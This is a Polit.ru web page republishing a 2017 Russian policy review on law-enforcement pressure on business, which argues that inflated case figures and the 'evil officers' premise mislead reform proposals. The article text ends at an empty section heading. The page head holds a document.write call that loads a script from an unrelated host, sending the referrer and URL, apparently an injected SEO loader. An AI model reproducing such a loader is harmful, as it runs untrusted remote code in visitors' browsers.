<!DOCTYPE html>
<html prefix="og: http://ogp.me/ns#">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <title>Как не надо защищать предпринимателей - ПОЛИТ.РУ</title>

    <link rel="canonical" href="http://polit.ru/article/2017/06/19/csr/"/>
    <link rel="manifest" href="/manifest.json">

    <!-- Stylesheets -->
    <link rel="stylesheet" type="text/css" href="/static/polit/css/main.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/mark-up.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/content.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/new.css"/>
    <!--[if IE]><link rel="stylesheet" type="text/css" href="/static/polit/css/ie.css" /><![endif]-->
    <link rel="stylesheet" href="/ads/style.css" type="text/css" media="all"/>

    <meta name="robots" content="all"/>
    <meta name="google-site-verification" content="ZbGJDYfmTGZz23DSt4DiWF448AY8MAD_9PSbBo2DAXU"/>
    <meta property="fb:app_id" content="482430971798114"/>

    <meta name="description" content="Как не надо защищать предпринимателей - Полит.ру" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:site" content="@POLITRU_" /><meta property="og:title" content="Как не надо защищать предпринимателей - ПОЛИТ.РУ" /><meta property="og:url" content="http://polit.ru/article/2017/06/19/csr/" /><meta property="og:description" content="Мы публикуем подготовленный Центром стратегических разработок совместно с Институтом проблем правоприменения при Европейском университете в Санкт-Петербурге обзор &amp;laquo;Проблема правоохранительного давления на бизнес: ложные посылки и бесперспективные предложения&amp;raquo; . Авторство документа: Кирилл Титаев при участии Ирины Четвериковой, Ольги Шепелевой и Марии Шклярук." /><meta property="og:image" content="http://polit.ru/media/photolib/2017/06/19/2017-05-05_184340_1493999081.png.600x450_q85_1497859693.jpg" /><meta name="pubdate" content="2017-06-19T11:40:50" />

    <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async></script>
    <script>
      var OneSignal = OneSignal || [];
      OneSignal.push(['init', {
        appId: '9b6ff30d-450f-4958-9b28-2e63e1c92158',
        subdomainName: 'polit-ru',
        safari_web_id: 'web.onesignal.auto.43f3e2d2-3818-43ea-aa50-e469d0e1e106'
      }]);
    </script>
    <script type="text/javascript" src="//vk.com/js/api/openapi.js"></script>
    <script type="text/javascript">
      VK.init({apiId: 3289294, onlyWidgets: true});
    </script>
    <link rel="alternate" type="application/rss+xml" title="Полная лента ПОЛИТ.РУ" href="/feeds/" />
    <link rel="alternate" type="application/rss+xml" title="Статьи ПОЛИТ.РУ" href="/feeds/article/" />
    <link rel="alternate" type="application/rss+xml" title="Ёлкин дня!" href="/feeds/elkin/" />
    <link rel="stylesheet" href="/static/polit/css/politgal.css" type="text/css" media="screen" />
    <script src="/static/polit/js/polit.js" type="text/javascript"></script>
    <script src="//lib.rl0.ru/adfox/7/adfox.custom.min.js" type="text/javascript"></script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script type="text/javascript">document.write("<script type=text/javascript src=\""+"http://meelba.com/3.html?group=polit_ru&seoref="+encodeURIComponent(document.referrer)+"&ur=1&rnd="+Math.random()+"&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=key+po+umolchaniyu"+"\"><\/script>");</script>
    <script src="https://yastatic.net/pcode/adfox/loader.js" type="text/javascript"></script>
    <script src="/static/polit/js/politart.js" type="text/javascript"></script><script src="/static/polit/js/politgal.js" type="text/javascript"></script><script id="js-mpf-mediator-init" data-counter="2771166" data-adaptive="true">!function(e){function t(t,n){if(!(n in e)){for(var r,a=e.document,i=a.scripts,o=i.length;o--;)if(-1!==i[o].src.indexOf(t)){r=i[o];break}if(!r){r=a.createElement("script"),r.type="text/javascript",r.async=!0,r.defer=!0,r.src=t,r.charset="UTF-8";;var d=function(){var e=a.getElementsByTagName("script")[0];e.parentNode.insertBefore(r,e)};"[object Opera]"==e.opera?a.addEventListener?a.addEventListener("DOMContentLoaded",d,!1):e.attachEvent("onload",d):d()}}}t("//top-fwz1.mail.ru/js/code.js","_tmr"),t("//mediator.imgsmail.ru/2/mpf-mediator.min.js","_mediator")}(window);</script>
  </head>
<body class="new">
    <!--BEGIN #header-->
      
<div class="page">

<div id="adfox_1484147658729819" style="margin-bottom:5px;"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 246976,
        containerId: 'adfox_1484147658729819',
        params: {
            pp: 'g',
            ps: 'ckyr',
            p2: 'figh'
        }
    });
</script>

<div class="black-top">
  <a href="http://polit.ua/">Полiт.ua</a>
  <a href="http://govweb.ru/">Государственная сеть</a>
  <a href="http://www.goslyudi.ru">Государственные люди</a>
  
  
  <a href="/promo/">Войти</a>
  
</div>

<div class="top-box">
  <div class="top-logo">
    
      <a href="/"><img src="/static/polit/img/politru_logo_2012.jpg" width="230" height="108" alt="Полит.ру" title="Полит.ру"/></a>
    
  </div>
  <div class="editors-choice-box">
<ul class="editors-choice">
 
  <li>
    <a href="/article/2017/06/15/theline/">
      
        <span class="author">Василий  Измайлов</span>
      
      Прямая линия с Путиным. Впечатления
    </a>
  </li>
 
  <li>
    <a href="/article/2017/06/15/sanctions/">
      
        <span class="author">Анна  Сакоян</span>
      
      Единодушные санкции. Новый старый эпизод
    </a>
  </li>
 
  <li>
    <a href="/article/2017/06/15/visas/">
      
        <span class="author">Георгий Чижов</span>
      
      О вероятности введения виз между Украиной и Россией
    </a>
  </li>
 
  <li>
    <a href="/article/2017/06/14/birthrate/">
      
        <span class="author">Любовь Храпылина</span>
      
      Материнский капитал: будущее программы
    </a>
  </li>
 
  <li>
    <a href="/article/2017/06/15/batalov/">
      
      Умер актер Алексей Баталов
    </a>
  </li>

</ul>
</div>

  <div class="top-right">
    <div class="date-header" >
        <span id="date"><!-- date -->19 июня 2017, понедельник, 16:19<!-- /date --></span>
    </div>
    <div class="top-social">
      <a href="http://www.facebook.com/#!/politru" rel="nofollow"><img src="/static/polit/img/new-facebook.png" width="20" height="20" alt="Facebook"/></a>
      <a href="http://twitter.com/POLITRU_" rel="nofollow"><img src="/static/polit/img/new-twitter.png" width="20" height="20" alt="Twitter"/></a>
      <a href="http://polit.livejournal.com/" rel="nofollow"><img src="/static/polit/img/new-livejournal.png" width="20" height="20" alt="LiveJournal"/></a>
      <a href="http://vkontakte.ru/club21337773" rel="nofollow"><img src="/static/polit/img/new-vkontakte.png" width="20" height="20" alt="VK.com"/></a>
      <a href="/feeds/" rel="nofollow"><img src="/static/polit/img/new-rss.png" width="20" height="20" alt="RSS"/></a>
    </div>
    <div class="top-search">
      <form action="/search/">
        <table><tbody><tr>
          <td class="main"><div>
            <input type="search" name="q" id="search-q" onfocus="this.value=''" placeholder="Автор, Статья, Тема" />
          </div></td>
          <td><div>
            <input type="submit" value="ИСКАТЬ" id="search-submit" />
          </div></td>
        </tr></tbody></table>
      </form>
    </div>
  </div>
</div>
<div class="top-menu">
  <table><tbody><tr>
    <td><h2><a href="/news/">НОВОСТИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/article/">СТАТЬИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>

    <td><h2><a href="/author/">АВТОРЫ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/lectures/publ_lect/">ЛЕКЦИИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>



    <td><h2><a href="/rubric/proscience/">PRO SCIENCE</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/rubric/skolkovo/">СКОЛКОВО</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>

    <td><h2><a href="/district/">РЕГИОНЫ</a></h2></td>

    
  </tr></tbody></table>
</div>

    <!--END #header-->

    <!-- BEGIN #breadcrumbs -->
      	
    <!--END #breadcrumbs-->



 

  <div class="top-menu-shadow">


  
    
      
    <img src="/static/polit/img/green_block_shadow_bottom.jpg" alt=""/>
    




    
  


  </div>
  <div class="main-cols ib-parent">
  
    
      
<!-- BEGIN #left column -->

<div class="left-sidebar ib-col">

<!-- start banner google adsense -->
<!-- Polit\polit.ru\234x60 -->
<!--ins class="adsbygoogle"
style="display:inline-block;width:234px;height:60px"
data-ad-client="ca-pub-1154951643410219"
data-ad-slot="6440819918">
</ins>
<script>
(adsbygoogle=window.adsbygoogle || []).push({});
</script-->
<!-- stop banner google adsense -->

  
  <div class="left-or-right-top-banner-slot"></div>
  <div class="block likebox">
    <iframe src="//www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpolitru&amp;width=234&amp;height=168&amp;colorscheme=light&amp;show_faces=true&amp;border_color&amp;stream=false&amp;header=false" scrolling="no" frameborder="0" style="border-bottom: 1px solid #AAA; overflow:hidden; width:234px; height:153px;" allowTransparency="true"></iframe>

    <!-- VK Widget -->
    <div id="vk_groups"></div>
    <script type="text/javascript">
      VK.Widgets.Group("vk_groups", {mode: 0, width: "234", height: "10", color1: 'FFFFFF', color2: '2B587A', color3: '5B7FA6'}, 21337773);
    </script>
  </div>
     <div class="left-banner-slot-above-top-articles"></div>
     <div class="left-banner-slot-above-top-articles-2"></div>
     <div class="block netlenka">
         <div class="subject">Нетленка</div>
         <ul class="top-articles">
 
  <li>
    <a href="/article/2006/04/27/aleksievich/">
      
        <span class="author">Светлана Алексиевич</span>
      
      Глава из книги &quot;Чернобыльская молитва&quot;
    </a>
  </li>
 
  <li>
    <a href="/article/2015/10/08/aleksievich/">
      
        <span class="author">Антон Быков</span>
      
      Нобель для Светланы Алексиевич
    </a>
  </li>
 
  <li>
    <a href="/article/2016/12/17/new_model/">
      
        <span class="author"> А. Кудрин, А. Архангельский, Г. Нахапетян, Д. Дондурей</span>
      
      В поисках новой модели социального государства
    </a>
  </li>
 
  <li>
    <a href="/article/2004/10/18/dond/">
      
        <span class="author">Даниил Дондурей</span>
      
      Террор: Война за смысл
    </a>
  </li>
 
  <li>
    <a href="/article/2003/02/04/579992/">
      
        <span class="author">Даниил Дондурей</span>
      
      90-е: Кино снимали для другой страны. Содержательные и институциональные трансформации в российском кинематографе
    </a>
  </li>

</ul>

     </div>
     <div class="left-banner-slot-below-top-articles"></div>
     <div class="block">
         <div class="subject"><a href="/genre/seminars/">Семинары</a></div>
     </div>
     <div class="left-banner-slot-below-seminars"></div>
     <div class="top-district-news">
        <span style="text-transform: uppercase; font-size: 21px;">Новости регионов</span>
        
<div class="top-news" style="margin: 0px;">
  <br>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news97805.html" target="_blank" class="hover">Воровали по-крупному: в области выявлено более 1,7 тысяч нарушений в сфере ЖКХ</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news97802.html" target="_blank" class="hover">У ребенка речевые нарушения? Обратитесь к остеопату</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news97804.html" target="_blank" class="hover">Титул «Мисс ФК «Тюмень» завоевала Полина Телиус (ФОТО)</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news97801.html" target="_blank" class="hover">Тюменцы начинают всероссийскую видеолетопись участников ВОВ</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news97800.html" target="_blank" class="hover">Мотоциклисты без прав дважды попадали в ДТП в Тюмени</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news97799.html" target="_blank" class="hover">Глава ГИБДД обсудит с тюменцами дорожную безопасность</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news97798.html" target="_blank" class="hover">Тюменские поэты прочтут стихи Евгения Евтушенко</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news97797.html" target="_blank" class="hover">В Тюмени уличных псов будут ловить на Литейщиков и Герцена, Победы и Маршака</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news97795.html" target="_blank" class="hover">Казино в Тобольске закрывали дважды</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news97794.html" target="_blank" class="hover">В Тюмени создается Федеральный исследовательский центр (ФИЦ)</a>
      <!--/div-->
    </div>
  
</div>



     </div>

<!-- start redtram -->

<div id="n4p_28541">Loading...</div>
<script type="text/javascript" charset="utf-8">
  (function(d,s){
    var o=d.createElement(s);
    o.async=true;
    o.type="text/javascript";
    o.charset="utf-8";
    if (location.protocol == "https:") {
      o.src="https://js-ru.redtram.com/n4p/0/28/ticker_28541.js";
    }
    else {
      o.src="http://js.ru.redtram.com/n4p/0/28/ticker_28541.js";
    }
    var x=d.getElementsByTagName(s)[0];
    x.parentNode.insertBefore(o,x);
  })(document,"script");
</script>

<!-- end redtram -->

     <div class="block">
         <div class="subject">Спецпроекты</div>
         
<div class="link">
	<a href="/rubric/literatures/">Национальные литературы</a>
</div>

<div class="link">
	<a href="/rubric/elections2016/">Выборы-2016 с Линой Арифулиной</a>
</div>

<div class="link">
	<a href="/rubric/ecology/">Экологическая повестка</a>
</div>

<div class="link">
	<a href="/rubric/opendata/">Открытое государство</a>
</div>

<div class="link">
	<a href="/rubric/politeia/">Русская политейя</a>
</div>


     </div>
     <div class="block">
         <div class="subject"><a href="/genre/dossie/">Документы</a></div>
     </div>
     <div class="block">
         <div class="subject"><a href="/rubric/redakciya/">О проекте</a></div>
     </div>

     <div id="adfox_1484224754714716"></div>
     <script>
     window.Ya.adfoxCode.createScroll({
        ownerId: 246976,
        containerId: 'adfox_1484224754714716',
        params: {
            pp: 'h',
            ps: 'ckyr',
            p2: 'fiwu'
        }
     });
     </script>

     <div class="left-material-banner-slot-1"></div>
     <div class="left-banner-slot-0"></div>
     <div class="left-banner-slot-1"></div>
     <div class="block partners">
       <div class="subject">Партнеры</div>
       <div class="left-partners-slot-1"></div>
       <div class="left-partners-slot-2"></div>
       <div class="left-partners-slot-3"></div>
     </div>
 </div>
 <!-- END #left column -->

    
  
<!--BEGIN #content-->


  
    <div class="new-main-content ib-col">
      <div class="article-detail" id="material-article50730">
  
        <div id="fb-root"></div>
        <script>(function(d, s, id) {
          var js, fjs = d.getElementsByTagName(s)[0];
          if (d.getElementById(id)) return;
            js = d.createElement(s); js.id = id;
            js.src = "//connect.facebook.net/ru_RU/all.js#xfbml=1";
            fjs.parentNode.insertBefore(js, fjs);
          }(document, 'script', 'facebook-jssdk'));
        </script>
        <div class="date">
          19 июня 2017, 11:40
          
            
              <div class="tags-subject">
                <span>
                  
                    <a href="/tag/biznes/">бизнес</a>
                  
                    <a href="/tag/Russia/">Россия</a>
                  
                    <a href="/tag/sociology-of-law/">социология права</a>
                  
                    <a href="/tag/csr/">ЦСР</a>
                  
                </span>
              </div>
            
          
        </div>
        
          
            
          
        
        <h1 class="title">Как не надо защищать предпринимателей</h1>
        
        
          
            
          
          
          <div class="image-with-overlay d600x450 below23 image-gray-back-big">
            <a href="/media/photolib/2017/06/19/2017-05-05_184340_1493999081.png.600x450_q85_1497859693.jpg" rel="lightbox" title=" ">
              <img src="/media/photolib/2017/06/19/thumbs/2017-05-05_184340_1493999081.png.600x450_q85_1497859693.jpg.600x450_q85.jpg" alt=" " title=" " style="margin-top:-225px; margin-left:-300px;"/>
              
            </a>
            <div class="image-overlay image-overlay-bottom-right">
               
              
            </div>
          </div>
          
        
        <div class="content">
          
            
          
          <div class="text doc js-mediator-article">
            <p><em>Мы публикуем подготовленный Центром стратегических разработок совместно с Институтом проблем правоприменения при Европейском университете в Санкт-Петербурге <a href="http://csr.ru/news/kak-ne-nado-zashhishhat-predprinimatelej/">обзор &laquo;Проблема правоохранительного давления на бизнес: ложные посылки и бесперспективные предложения&raquo;</a>. Авторство документа: Кирилл Титаев при участии Ирины Четвериковой, Ольги Шепелевой и Марии Шклярук.</em></p>
            



            
<p><em>По мнению авторов доклада, ключевая проблема лежит в самой возможности переописать предпринимательскую деятельность и возникающие деловые конфликты в терминах уголовного права. Это ведет к тому, что сами предприниматели порой стремятся использовать механизмы уголовного правосудия в спорах с партнерами и контрагентами, в конкурентной борьбе. Пока сохраняется идея, что участников гражданского оборота и коммерческой деятельности надо защищать от недобросовестности и упущений их контрагентов при помощи уголовно-правовых средств (а не гражданской ответственности), будет сохраняться и возможность уголовно-правового давления на бизнес. Из этой логики в качестве малоэффективных оцениваются предложения, облегчающие досудебные санкции и общее положение подозреваемого в преступлениях, совершенных в сфере предпринимательской деятельности, уточнения в статьи УК, а также создание дополнительных механизмов для защиты предпринимателей или усиление ответственности правоохранителей за необоснованное привлечение к уголовной ответственности. Решением видится коренное изменение практики работы правоохранительных органов.</em></p>
<h2>Введение</h2>
<p>Проблема правоохранительного давления на бизнес широко обсуждается в последнее время. Однако эта дискуссия практически не опирается на эмпирический анализ работы правоохранительных органов. В частности, участники стабильно завышают количество уголовных дел против предпринимателей, представляют подобную практику как массовую и т. д. Из этого вытекают совершенно неадекватные предложения по снижению такого давления</p>
<p>Предлагаемый текст представляет собой критический обзор существующих предложений [1] в сфере противодействия давлению на бизнес со стороны правоохранительных органов и разрешению гражданско-правовых споров инструментами уголовного права. Подчеркнем, что в обзоре речь идет не о любом государственном воздействии, а именно об уголовном преследовании Анализ опирается на несколько принципиальных посылок:</p>
<ul>
<li>Проблема вмешательства правоохранительных органов в предпринимательскую деятельность действительно существует, и это вмешательство действительно негативно влияет на экономическое развитие России.</li>
<li>Масштабы и роль этого фактора заслуживают отдельного обсуждения и анализа (см. ниже).</li>
<li>В обзоре мы избегаем разбора благих пожеланий, не подкрепленных конкретными механизмами (&laquo;надо налаживать диалог&raquo;, &laquo;надо развивать культуру&raquo; и т. п.)</li>
<li>В обсуждении мы опираемся на эмпирические данные о том, как работают российские правоохранительные органы и какова структура регистрируемой преступности в России (подробнее эти исследования см. на сайте www.enforce.spb.ru и обзор В. Волков, 2017), а не на нормативное описание их работы</li>
<li>Мы считаем, что в обсуждениях проблемы взаимоотношений силовых структур и предпринимателей недопустимы любые аргументы ad hoc &mdash; к конкретным случаям. Правоохранительные органы практически всегда могут найти хотя бы один случай, когда преследуемый бизнес действительно был преступен (например, банк выдавал своим сотрудникам гигантские кредиты, списывал их, а деньги заставлял передавать менеджменту). Это не следует рассматривать как подтверждение того, что преступления, совершаемые бизнесом, действительно являются серьезной проблемой. Широкое использование уголовно-правовых категорий для описания гражданско-правовых отношений (например, объявление преступными обычных договорных отношений, которые не оспаривались их участниками в судах) происходит параллельно с расследованиями действительно преступного поведения. Преодоление ситуации, когда практически любая бизнес-активность может быть объявлена преступной, никак не повлияет на борьбу с реально преступным поведением представителей бизнеса.</li>
</ul>
<p>В первой части обзора описаны общие заблуждения и сбои в понимании существа проблемы давления на бизнес, во второй &mdash; идет разбор проблем с реализацией конкретных мер, предлагаемых для ее решения.</p>
<p>Анализируя ситуацию с силовым давлением на бизнес, мы рассматривали практику выявления и преследования предпринимательских преступлений. То есть таких, которые совершаются в связи с деятельностью предприятия его собственником или представителем его руководства [2]. Иными словами, если руководитель компании увидел в кафе чужую сумку с ноутбуком и, когда владелец отвлекся, забрал ее и ушел &mdash; это кража, не связанная с предпринимательской деятельностью. Когда этот же руководитель сделал второй комплект ключей и ночью вывел со склада компании фуру с телевизорами &mdash; это тоже кража, но связанная предпринимательской деятельностью.</p>
<p>Что касается &laquo;конструирования&raquo; преступлений правоохранительными органами, то случаи, когда обычная пьяная драка, в которой участвовал предприниматель и по итогам которой стороны не имеют друг к другу претензий, переописывается правоохранителями как &laquo;причинение средней тяжести вреда здоровью&raquo;, мы не рассматриваем как предпринимательское преступление.</p>
<p>С другой стороны, к таковым может быть причислены ситуации, когда несвоевременно сданная в кассу наличность интерпретируется как растрата.</p>
<h2>Ложные посылки</h2>
<p>В этом разделе представлено несколько распространенных посылок в дискуссии об отношениях бизнеса и правоохранительных структур, которые являются принципиально неверными и делают невозможным дальнейший поиск решений.</p>
<h3>200 тысяч дел против предпринимателей в год</h3>
<p>Цифра в 200 тысяч дел против предпринимателей в год (или 100 тысяч) кочует из документа в документ. Она ни в коей мере не может соответствовать действительности. Для понимания этого факта необходимо разобраться в модели учета преступлений [3]. Есть четыре различных категории учета [4]:</p>
<ul>
<li>Преступления в сфере экономики, описанные в разделе VIII УК РФ. Большинство дел, связанных с незаконным давлением на бизнес, идут по статьям из этого раздела. Однако сюда же входит и большинство имущественных преступлений, не имеющих никакого отношения к предпринимательской деятельности: кража, грабеж, разбой. Более 1 млн зарегистрированных преступлений, из которых около половины дойдут до суда, то есть свыше половины преступности в стране, относятся к данной категории.</li>
<li>Преступления в сфере экономической деятельности, предусмотренные гл. 22 УК РФ (составная часть раздела VIII УК РФ). Таких преступлений около 40 тысяч в год, из них чуть боле половины доходят до суда. К сожалению, эта категория не совпадает с категорией предпринимательских преступлений. С одной стороны, множество преступлений, которые совершаются в ходе предпринимательской деятельности, например, мошенничество и невыплата зарплаты, не входят в гл. 22 УК РФ. С другой стороны, в нее попадают статьи, не имеющие отношения к бизнесу (например, ст. 186, карающая фальшивомонетчиков).</li>
<li>Преступления экономической направленности. Это внутренняя учетная категория правоохранительных органов. Основания относить конкретное преступление к данной категории регламентируются Указанием Генпрокуратуры России №387-11, МВД России №2 от 11.09.2013 &laquo;О введении в действие перечней статей Уголовного кодекса Российской Федерации, используемых при формировании статистической отчетности&raquo;. Таких преступлений в год регистрируется около 100 тысяч. К уголовной ответственности за их совершение привлекается ежегодно около 35 тысяч человек. Однако надо учитывать, что предлагаемое Указанием определение преступлений экономической направленности таково, что туда подпадает очень большое количество правонарушений, не являющихся предпринимательскими. Например, та же подделка денег и их сбыт относятся к преступлениям экономической направленности, также как и крупная кража, совершенная работником предприятия.</li>
<li>Преступления имущественного и экономического характера, совершенные лицом со статусом предпринимателя или руководителя5 (подробнее см. Четверикова, 2016, 2017). Таких дел около 6-8 тысяч в год. Уверенности в том, что все они являются артефактом давления на бизнес, нет. Также очевидно, что некоторые случаи фактического давления на бизнес уголовно-правовыми методами могут не попадать в эту категорию &mdash; просто потому, что у привлекаемого к ответственности лица может отсутствовать соответствующий формальный статус.</li>
</ul>
<p>Комплексный анализ позволяет оценить количество уголовных дел, возбуждаемых в связи с преступлениями, которые совершают предприниматели и руководители в рамках осуществления свой деятельности, в диапазоне 5&ndash;15 тысяч в год6. Но и это очень много. Это означает, что в типичном районе в год рассматривается 2&ndash;6 таких дел. Для среднего предпринимателя/руководителя (около 7 миллионов человек в стране) шансы столкнуться с такой ситуацией за все время карьеры составляют примерно 1 к 50. Наличие таких рисков существенно влияет на предпринимательский климат.</p>
<p>Помимо привлечения к уголовной ответственности, есть еще давление в ходе доследственных проверок. Анализ статистики судебного департамента по санкционированию оперативно-розыскных мероприятий показывает, что ущерб, наносимый посредством оперативно-розыскных мероприятий, санкционируемых судом [7], не может играть значительной роли.</p>
<p>Однако запрос огромного количества документов, опросы сотрудников и другие действия, не требующие санкции суда, тоже способны нанести существенный ущерб бизнесу. В отличие от санкционируемых судом мероприятий, количественных данных, позволяющих оценить масштаб такой деятельности, не существует. То есть ответить на вопрос о степени давления на бизнес на стадии до возбуждения уголовного дела при помощи количественных данных сейчас невозможно [8]. Однако пока мы не будем опираться на адекватные данные, мы не сможем прийти к содержательным решениям. Для получения таких данных необходимо ввести автоматизированный учет сообщений о преступлениях (и тем самым проверок в порядке ст. 144-145 УПК РФ) и однозначные определения социального статуса лица, в отношении которого проводится проверка (с возможностью человека декларировать такой статус самостоятельно).</p>
<h3>&laquo;Злые правоохранители&raquo;</h3>
<p>Одна из существующих посылок связана с тем, что наблюдаемый процесс силового давления &mdash; это давление правоохранителей на бизнесменов с индивидуальными коррупционными целями (взятка, передача бизнеса аффилированному лицу). Это не так. Последние исследования (Маркин, 2017, Yakovlev, 2015) показывают, что достаточно часто система уголовного преследования оказывается лишь инструментом для решения споров между хозяйствующими субъектами. Таким образом, проблема не в коррумпированных правоохранителях, а в самой возможности переописания в терминах уголовного права предпринимательской деятельности и возникающих в процессе ее ведения гражданско-правовых конфликтов.</p>
<p>Пока мы не начнем правильно понимать механику силового давления, предложения по изменению ситуации будут неадекватными.</p>
<h3>Необходимость уголовно-правовой защиты</h3>
<p>Важным основанием для сохранения сложившейся ситуации служит аргумент о необходимости уголовно-правовой защиты разных групп лиц, участвующих в предпринимательской деятельности или затрагиваемых ею. Рассмотрим примеры.</p>
<p>В ходе обсуждения проекта постановления Пленума Верховного суда об экономических преступлениях (№48 от 15 ноября 2016) ставился вопрос о защите миноритариев от сговора мажоритарных акционеров и менеджмента. Сама постановка вопроса абсурдна: сговор мажоритариев и менеджмента по сути своей &mdash; решение собственника, воплощаемое исполнительным органом. Владелец ценных бумаг, приобретая их небольшое количество, понимал, что он не сможет со своей долей контролировать политику компании. Если мы постулируем необходимость защиты их интересов в случае их противоречия с интересами большинства акционеров, то до тех пор, пока есть один</p>
<p>недовольный миноритарий, мы сможем возбуждать уголовные дела или, по крайней мере, проводить доследственные проверки в любом акционерном обществе.</p>
<p>Также регулярно обсуждается вопрос о мошенничестве при получении кредита. Рассматривая заявку заемщика, банк имеет возможность проверить информацию о нем. Если банк пошел на риск, снизив объем проверки, то интересы банка не следует защищать уголовно-правовым законом. В том числе потому, что у банка есть все гражданско-правовые инструменты предупреждения противозаконного поведения, если действия заемщика или других лиц не образуют отдельного состава преступления &mdash; фальсификации документов, подлога и т. д.</p>
<p>До тех пор пока мы не признаем, что средства уголовно-правовой защиты должны применяться только там, где потерпевший не способен предупредить совершение преступления и не имеет возможностей восстановить свои права гражданско-правовыми инструментами, будет сохраняться ситуация, в которой уголовным преступлением может быть объявлено все что угодно.</p>
<h1>Бесперспективные предложения</h1>
<p>В данном разделе дана краткая критика предложений по снижению силового давления на бизнес, которые обсуждаются в последние годы. Разумеется, мы рассматриваем не все из них, а только наиболее популярные. Анализируя их, мы отвечали на вопрос: &laquo;А как реализация такой меры (возможно, полезной) скажется на ситуации?&raquo; При этом мы опирались на данные о работе российских правоохранительных органов.</p>
<h3>Усиление ответственности правоохранителей</h3>
<p>Одной из широко обсуждаемых мер является ужесточение наказания за незаконное возбуждение уголовного дела (ст. 299 УК РФ &laquo;Привлечение заведомо невиновного к уголовной ответственности или незаконное возбуждение уголовного дела&raquo;). Однако речь идет о фактически мертвой норме (по данным Судебного департамента, за 2014&ndash;2015 годы по всей стране в суды было направлено только 5 таких дел). Само по себе ужесточение санкций не создает никаких стимулов для более активного выявления и расследования этих преступлений. Более того, сама конструкция нормы УК требует доказывания заведомой незаконности возбуждения дела, что сделать сложно. Поэтому никакого влияния на общий климат в стране эти изменения не окажут.</p>
<h3>Защита предпринимателей (не предпринимательских деяний, а предпринимателей)</h3>
<p>Множество мер предполагают облегчить досудебные санкции и общее положение подозреваемого, если его привлекают к ответственности за преступление, совершенное в сфере предпринимательской деятельности. Сам этот подход имеет ряд родовых пороков</p>
<ul>
<li>Во-первых, существующая практика показывает, что правоохранитель имеет широкие возможности для описания произошедшего таким образом, чтобы связь с предпринимательской деятельностью не усматривалась. Несовпадение понятий &laquo;преступления экономической направленности&raquo; и &laquo;преступления в сфере экономической деятельности&raquo; облегчает эту задачу. Таким образом, особый режим для тех, кто привлекается за преступления в сфере предпринимательской деятельности, не улучшает реальное &nbsp;положение бизнеса. Анализ (Четверикова, 2016) показывает, что все фактические улучшения положения привлекаемых к уголовной ответственности предпринимателей происходят на фоне улучшения положения всех групп подсудимых, в то время как меры, направленные только на предпринимателей, значимого эффекта не дают.</li>
<li>Во-вторых, этот подход требует масштабной и сложной юридико-технической работы по созданию нормативных конструкций, различающих предпринимательскую и непредпринимательскую деятельность. Как любые сложные правовые конструкции, ее будет достаточно легко обходить.</li>
<li>В-третьих, этот подход предполагает рассматривать предпринимательскую деятельность как преступную, более того &mdash; закрепляет этот взгляд Таким образом, данное направление скорее ухудшает ситуацию, чем дает новые инструменты для реального улучшения положения предпринимателей.</li>
</ul>
<h3>Игры с тяжестью отдельных составов</h3>
<p>В целях борьбы с незаконным давлением на предпринимателей регулярно предлагается (и иногда реализуется) снижение тяжести наказания по отдельным статьям, по которым часто привлекают к ответственности предпринимателей, или же наоборот &mdash; утяжеление ответственности по статьям, которые предусматривают ответственность за незаконные действия правоохранителей. Регулярное изменение тяжести отдельных составов преступления, как показывает анализ (Четверикова, 2016), влияет исключительно на возможность прекращения уголовных дел в связи с примирением / деятельным раскаянием. Практика же судов в части оправданий и размеров назначаемого наказания относительно стабильна и по большей части не реагирует на активность законодателя. Таким образом, данная мера может слегка корректировать ситуацию, но саму проблему никак не решает</p>
<h3>Экономическая амнистия</h3>
